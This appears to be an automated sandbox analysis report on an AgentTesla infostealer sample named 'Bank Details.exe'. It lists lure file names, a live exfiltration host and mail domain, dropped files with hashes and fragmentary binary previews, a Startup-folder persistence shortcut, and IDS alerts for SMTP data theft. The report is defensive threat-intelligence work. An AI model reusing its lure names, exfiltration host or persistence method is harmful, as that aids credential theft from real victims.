                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      193.141.65.39invoice and packing list.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        PO202408030008.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          shipping documents.bat.exeGet hashmaliciousAgentTeslaBrowse
                            INV&PL.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              BL&CO.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                DHL_CBJ520818836689.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  DHL_CBJ520818836689.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    AWB#150322..exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      mail.azmaplast.cominvoice and packing list.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39
                                      PO202408030008.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 193.141.65.39
                                      shipping documents.bat.exeGet hashmaliciousAgentTeslaBrowse
                                      • 193.141.65.39
                                      INV&PL.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39
                                      BL&CO.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39
                                      DHL_CBJ520818836689.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39
                                      DHL_CBJ520818836689.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39
                                      AWB#150322..exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      KPNNLinvoice and packing list.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 193.141.65.39
                                      PO202408030008.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 193.141.65.39
                                      shipping documents.bat.exeGet hashmaliciousAgentTeslaBrowse
                                      • 193.141.65.39
                                      154.216.17.9-skid.arm7-2024-08-04T06_23_04.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 192.54.111.44
                                      SecuriteInfo.com.Linux.Siggen.9999.32301.6786.elfGet hashmaliciousMiraiBrowse
                                      • 92.71.5.181
                                      4qOdQ3lrYx.elfGet hashmaliciousMiraiBrowse
                                      • 212.189.107.76
                                      arm7.elfGet hashmaliciousMiraiBrowse
                                      • 62.132.39.114
                                      TWzzHuqCOF.elfGet hashmaliciousMiraiBrowse
                                      • 212.189.107.91
                                      CMgd5ZVG2N.elfGet hashmaliciousUnknownBrowse
                                      • 62.41.8.97
                                      VXBKak29Dz.elfGet hashmaliciousMiraiBrowse
                                      • 92.71.5.129

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSigned Document..exeGet hashmaliciousRemcos, DarkTortilla, PureLog StealerBrowse
                                        PO CONTRACT.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          image.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                            ABA NEW ORDER No.2400228341.pdf.exeGet hashmaliciousAsyncRATBrowse
                                              09099627362726.exeGet hashmaliciousAgentTeslaBrowse
                                                SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                                  719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                                    ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                                      F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                                        @#U570b#U5167DEBIT#U5e33#U55ae[#U4e2d#U6587#U672c#U5e63]-OI(K)_20240612161821.scr.exeGet hashmaliciousDarkTortilla, XWormBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bank Details.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Bank Details.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
                                                          MD5:EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
                                                          SHA1:B2A052ACB64FC7173E568E1520AA4D713C5E90A3
                                                          SHA-256:50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
                                                          SHA-512:D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
                                                          Malicious:true
                                                          Reputation:moderate, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                          File Type:CSV text
                                                          Category:modified
                                                          Size (bytes):1089
                                                          Entropy (8bit):5.3331074454898735
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
                                                          MD5:E54FE55F93C5501D5C4737CCF0E6E48B
                                                          SHA1:BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
                                                          SHA-256:2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
                                                          SHA-512:5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\udo.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Bank Details.exe
                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                          Category:dropped
                                                          Size (bytes):774
                                                          Entropy (8bit):3.113702258773203
                                                          Encrypted:false
                                                          SSDEEP:12:8wl0JRsXyEKW2je/GX35VEaM0EHaDwa4t2YZ/elFlSJm:8d+lKPjeen5jfDw2qy
                                                          MD5:BEAD12C16C06AD8D4BD4C33DE70250D8
                                                          SHA1:9232C3317D2DFF015D6932CEB78F92C8DFFF548A
                                                          SHA-256:329604A4F64DF5291BE74B61524B701618D1A0992F402DD785D0DDBD722AB858
                                                          SHA-512:17826577602B6AFBEEBDC77A327730DBE56B084B0F241ECC348D75F5336AA1E688C522093902900CD03466473A793EBB8F7EF87F7D2FEDCFF79A44AFC8A1D469
                                                          Malicious:false
                                                          Preview:L..................F........................................................y....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........Desktop.@............................................D.e.s.k.t.o.p.....V.2...........udo.exe.@............................................u.d.o...e.x.e.......$.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.d.o...e.x.e...C.:.\.U.s.e.r.s.\.t.i.n.a.\.D.e.s.k.t.o.p.\.u.d.o...e.x.e.........:..,.LB.)...A!...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                          C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:modified
                                                          Size (bytes):42064
                                                          Entropy (8bit):6.19564898727408
                                                          Encrypted:false
                                                          SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                          MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                          SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                          SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: Signed Document..exe, Detection: malicious, Browse
                                                          • Filename: PO CONTRACT.exe, Detection: malicious, Browse
                                                          • Filename: image.exe, Detection: malicious, Browse
                                                          • Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious, Browse
                                                          • Filename: 09099627362726.exe, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe, Detection: malicious, Browse
                                                          • Filename: 719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe, Detection: malicious, Browse
                                                          • Filename: ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exe, Detection: malicious, Browse
                                                          • Filename: F46VBJ6Yvy.exe, Detection: malicious, Browse
                                                          • Filename: @#U570b#U5167DEBIT#U5e33#U55ae[#U4e2d#U6587#U672c#U5e63]-OI(K)_20240612161821.scr.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

                                                          C:\Users\user\Desktop\udo.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1201152
                                                          Entropy (8bit):6.285817801941888
                                                          Encrypted:false
                                                          SSDEEP:24576:CGAM4OF+PMwrSVlbmfDYkhDvGtjXtGUAF9kJ7MqudghfEuCj0hThiHHxlhViP2y3:CsMwPDoi
                                                          MD5:99484DD2AEBFF67B20E11B5AF574A8BE
                                                          SHA1:DBDDDA933FBB6BB76004C6A27254575EAEDE9761
                                                          SHA-256:A130B1DE44BB0E882375378F9C3DDCF94508674164458D76AE06BB9FD36393EB
                                                          SHA-512:7E61FE4C64ACE77B78F2FDD820C24C95CE6A9D9D9B1AB114E943A134D2B3790E1302815CD21FFA4D721C1CF554D386C77AB0B9DF8DC9D59BA35DBF42809758DC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                          • Antivirus: Virustotal, Detection: 43%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...P..L...........j... ........@.. ....................................`..................................i..O.................................................................................... ............... ..H............text...4J... ...L.................. ..`.rsrc................N..............@..@.reloc...............R..............@..B.................j......H...........,.......l.......&.................................................................................................................................................................................(....*&..(.....*.s.........s ........s!........s"........s#........*Z........o6...........*&..(7....*j..{....(...+}.....{....+.*...{......,.+.....,.rq..ps<...z..|....(...+*&........*".......*Vs'...(A...t.........*..(B...*..(7......}......}.....sC...}....*...{$....r3..p.....

                                                          C:\Users\user\Desktop\udo.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2017
                                                          Entropy (8bit):4.659840607039457
                                                          Encrypted:false
                                                          SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                                          MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                                          SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                                          SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                                          SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                                          Malicious:false
                                                          Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\PING.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2244
                                                          Entropy (8bit):4.727829096917234
                                                          Encrypted:false
                                                          SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTZ:/qgj+AokItULVDv
                                                          MD5:0E354411D7CF432E38D65F979A0C1EF3
                                                          SHA1:81E9601E4563D1D192BD59A511EDE5EC509CFD6D
                                                          SHA-256:B52FF9EB9C115E0A3C22970F658F5EBD7698C4181EAAD047A4F5415BF953EBAD
                                                          SHA-512:E72B85E99725DCF011090F48DCF8F0D5EA98C2960838BCD19E64462DE4636E8D8469751C156FEC1048B732771CF036A69FA51873417909FA09FD56E8B71CD1E2
                                                          Malicious:false
                                                          Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):6.285817801941888
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:Bank Details.exe
                                                          File size:1'201'152 bytes
                                                          MD5:99484dd2aebff67b20e11b5af574a8be
                                                          SHA1:dbddda933fbb6bb76004c6a27254575eaede9761
                                                          SHA256:a130b1de44bb0e882375378f9c3ddcf94508674164458d76ae06bb9fd36393eb
                                                          SHA512:7e61fe4c64ace77b78f2fdd820c24c95ce6a9d9d9b1ab114e943a134d2b3790e1302815cd21ffa4d721c1cf554d386c77ab0b9df8dc9d59ba35dbf42809758dc
                                                          SSDEEP:24576:CGAM4OF+PMwrSVlbmfDYkhDvGtjXtGUAF9kJ7MqudghfEuCj0hThiHHxlhViP2y3:CsMwPDoi
                                                          TLSH:674519D94EA57222C217F1380F77872E675C2D77E6128A8909839897FE3D34EDC184E9
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...P..L...........j... ........@.. ....................................`................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x526a2e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x1091A9A2 [Mon Oct 23 09:06:42 1978 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1269dc0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1280000x3fc.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x124a340x124c00c44c8fa62eac899f389204177197981cFalse0.5699697440755764data6.290236874689579IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x1280000x3fc0x400eabe670b182a8746487140bc13cbc27eFalse0.427734375data3.489581091604726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x12a0000xc0x20010a89062d4a9a3b41c70bcc200ce3ee3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x1280580x3a4data0.43991416309012876

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                          2024-08-29T12:15:51.200916+0200TCP2030171ET MALWARE AgentTesla Exfil Via SMTP149722587192.168.2.9193.141.65.39
                                                          2024-08-29T12:15:51.200916+0200TCP2839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity149722587192.168.2.9193.141.65.39
                                                          2024-08-29T12:15:51.200916+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2149722587192.168.2.9193.141.65.39
                                                          2024-08-29T12:19:15.736943+0200TCP2855245ETPRO MALWARE Agent Tesla Exfil via SMTP149722587192.168.2.9193.141.65.39
                                                          2024-08-29T12:19:15.736943+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity149722587192.168.2.9193.141.65.39

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 29, 2024 12:19:02.547275066 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:02.553345919 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:02.553425074 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:13.055720091 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.059863091 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:13.066245079 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.329261065 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.332212925 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:13.337064028 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.601562977 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.603807926 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:13.608612061 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.889111042 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:13.889527082 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:13.894283056 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:14.158946037 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:14.159256935 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:14.164077044 CEST58749722193.141.65.39192.168.2.9
